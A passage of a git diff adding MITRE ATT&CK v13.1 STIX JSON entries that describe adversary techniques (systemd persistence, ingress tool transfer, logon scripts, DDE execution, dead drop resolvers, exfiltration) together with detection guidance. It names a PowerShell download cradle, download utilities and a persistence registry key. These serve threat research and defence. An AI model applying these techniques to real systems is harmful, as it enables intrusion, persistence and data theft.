"File: File Modification", + "Service: Service Creation", + "File: File Creation" + ], + "x_mitre_permissions_required": [ + "User", + "root" + ], + "type": "attack-pattern", + "id": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "created": "2020-01-17T16:15:19.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1543/002", + "external_id": "T1543.002" + }, + { + "source_name": "Anomali Rocke March 2019", + "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", + "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + }, + { + "source_name": "freedesktop systemd.service", + "description": "Free Desktop. (n.d.). systemd.service \u2014 Service unit configuration. Retrieved March 20, 2023.", + "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html" + }, + { + "source_name": "Linux man-pages: systemd January 2014", + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", + "url": "http://man7.org/linux/man-pages/man1/systemd.1.html" + }, + { + "source_name": "Berba hunting linux systemd", + "description": "Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.", + "url": "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + }, + { + "source_name": "Rapid7 Service Persistence 22JUNE2016", + "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.", + "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence" + }, + { + "source_name": "lambert systemd 2022", + "description": "Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.", + "url": "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58.json new file mode 100644 index 0000000000000000000000000000000000000000..d737bd70309ba54b9b477ed923be1eea78ac0c67 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--7cc89fec-8e43-4dc2-981d-5ffc7f2f60ee", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:50.920Z", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Creation", + "Firewall: Firewall Enumeration", + "Command: Command Execution", + "Firewall: Firewall Metadata" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "id": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "created": "2019-09-16T17:52:44.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1518", + "external_id": "T1518" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add.json new file mode 100644 index 0000000000000000000000000000000000000000..d0fb4051a718d5b75b95014910ef0902d13ce6cd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--d9495516-678f-4849-8082-f94a3f0c93be", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:27:57.370Z", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)\n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_contributors": [ + "John Page (aka hyp3rlinx), ApparitionSec", + "Mark Wee" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows netsh interface portproxy modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "File: File Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "created": "2017-05-31T21:31:16.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1105", + "external_id": "T1105" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "t1105_lolbas", + "description": "LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.", + "url": "https://lolbas-project.github.io/#t1105" + }, + { + "source_name": "PTSecurity Cobalt Dec 2016", + "description": "Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.", + "url": "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3.json new file mode 100644 index 0000000000000000000000000000000000000000..1ea5cac261a4cbff5c034440ea909efe78527c7a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--44a75af4-3f7d-4a5a-a67b-225b1328f20c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "type": "attack-pattern", + "created": "2020-01-10T03:43:37.211Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1037.001", + "url": "https://attack.mitre.org/techniques/T1037/001" + }, + { + "url": "https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx", + "description": "Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.", + "source_name": "TechNet Logon Scripts" + }, + { + "source_name": "Hexacorn Logon Scripts", + "url": "http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/", + "description": "Hexacorn. (2014, November 14). Beyond good ol\u2019 Run key, Part 18. Retrieved November 15, 2019." + } + ], + "modified": "2020-03-24T23:45:03.153Z", + "name": "Logon Script (Windows)", + "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0.json new file mode 100644 index 0000000000000000000000000000000000000000..2ccd5a401ecab822ccc929c4984a9a31efe220c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0.json @@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--c30444f1-aeda-4c08-bbf1-86788f986d24", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "type": "attack-pattern", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1173", + "url": "https://attack.mitre.org/techniques/T1173" + }, + { + "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/", + "description": "Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.", + "source_name": "BleepingComputer DDE Disabled in Word Dec 2017" + }, + { + "url": "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021", + "description": "Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.", + "source_name": "Microsoft ADV170021 Dec 2017" + }, + { + "url": "https://technet.microsoft.com/library/security/4053440", + "description": "Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.", + "source_name": "Microsoft DDE Advisory Nov 2017" + }, + { + "url": "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/", + "description": "El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.", + "source_name": "SensePost PS DDE May 2016" + }, + { + "url": "https://www.contextis.com/blog/comma-separated-vulnerabilities", + "description": "Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.", + "source_name": "Kettle CSV DDE Aug 2014" + }, + { + "url": "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee", + "description": "Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.", + "source_name": "Enigma Reviving DDE Jan 2018" + }, + { + "url": "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/", + "description": "Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.", + "source_name": "SensePost MacroLess DDE Oct 2017" + }, + { + "url": "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/", + "description": "NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.", + "source_name": "NVisio Labs DDE Detection Oct 2017" + } + ], + "modified": "2022-02-09T20:22:43.284Z", + "name": "Dynamic Data Exchange", + "description": "Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nAdversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_detection": "OLE and Office Open XML files can be scanned for \u2018DDEAUTO', \u2018DDE\u2019, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)\n\nMonitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.\n\nMonitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433.json new file mode 100644 index 0000000000000000000000000000000000000000..2ea124914128bccad86f64075a96ea29261a2a13 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--97c82de7-1fc1-489d-a367-0717f41a3c06", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "type": "attack-pattern", + "created": "2017-05-31T21:30:21.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1008", + "external_id": "T1008" + }, + { + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "source_name": "University of Birmingham C2" + } + ], + "modified": "2020-07-14T19:49:47.340Z", + "name": "Fallback Channels", + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636.json new file mode 100644 index 0000000000000000000000000000000000000000..8cd0c2e7248a107f9417bb29c86e6b4e328c351c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--901fa337-dce8-45c9-9a87-1b7ecc7f1760", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "type": "attack-pattern", + "created": "2020-10-01T02:17:46.086Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.005", + "url": "https://attack.mitre.org/techniques/T1588/005" + }, + { + "source_name": "Exploit Database", + "url": "https://www.exploit-db.com/", + "description": "Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020." + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + }, + { + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "source_name": "PegasusCitizenLab" + }, + { + "source_name": "Wired SandCat Oct 2019", + "url": "https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", + "description": "Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020." + } + ], + "modified": "2021-04-15T03:14:01.255Z", + "name": "Exploits", + "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7.json new file mode 100644 index 0000000000000000000000000000000000000000..b7fdbc05904ccb9c708b95e3fc07061636f58518 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--bf47c16e-5cbc-46d4-83f1-ed65c040d9f1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "type": "attack-pattern", + "created": "2020-03-14T22:24:21.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1102.001", + "url": "https://attack.mitre.org/techniques/T1102/001" + }, + { + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "source_name": "University of Birmingham C2" + } + ], + "modified": "2020-03-26T23:12:30.499Z", + "name": "Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b.json new file mode 100644 index 0000000000000000000000000000000000000000..2acf29509e5d81e8a817488e42a732a7595af1e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--c7d99df9-2a46-48b5-a359-502917890cd0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T23:39:25.476Z", + "name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_contributors": [ + "William Cain", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) \n\nFor network infrastructure devices, collect AAA logging to monitor for `copy` commands being run to exfiltrate configuration files to non-standard destinations over unencrypted protocols such as TFTP.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.1", 